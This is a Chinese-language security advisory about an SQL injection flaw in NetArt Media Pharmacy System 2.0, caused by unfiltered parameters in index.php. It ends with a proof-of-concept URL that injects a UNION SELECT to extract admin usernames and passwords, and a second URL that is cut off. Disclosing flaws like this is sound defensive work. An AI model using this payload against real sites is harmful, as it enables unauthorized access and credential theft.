Pharmacy System是一款基于PHP的WEB应用程序。
Pharmacy System不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞进行SQL注入攻击获得敏感信息。
问题是由于’index.php’脚本对用户提交的WEB参数缺少过滤,提交恶意SQL查询作为参数数据,可导致应用程序处理时更改原来的SQL逻辑,攻击者可以获得敏感信息或者操作数据库。
NetArt Media Pharmacy System 2.0
目前没有解决方案提供:
<a href=“http://www.netartmedia.net/pharmacysystem/” target=“_blank”>http://www.netartmedia.net/pharmacysystem/</a>
http://www.example.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users
http://www.example.com/SCRI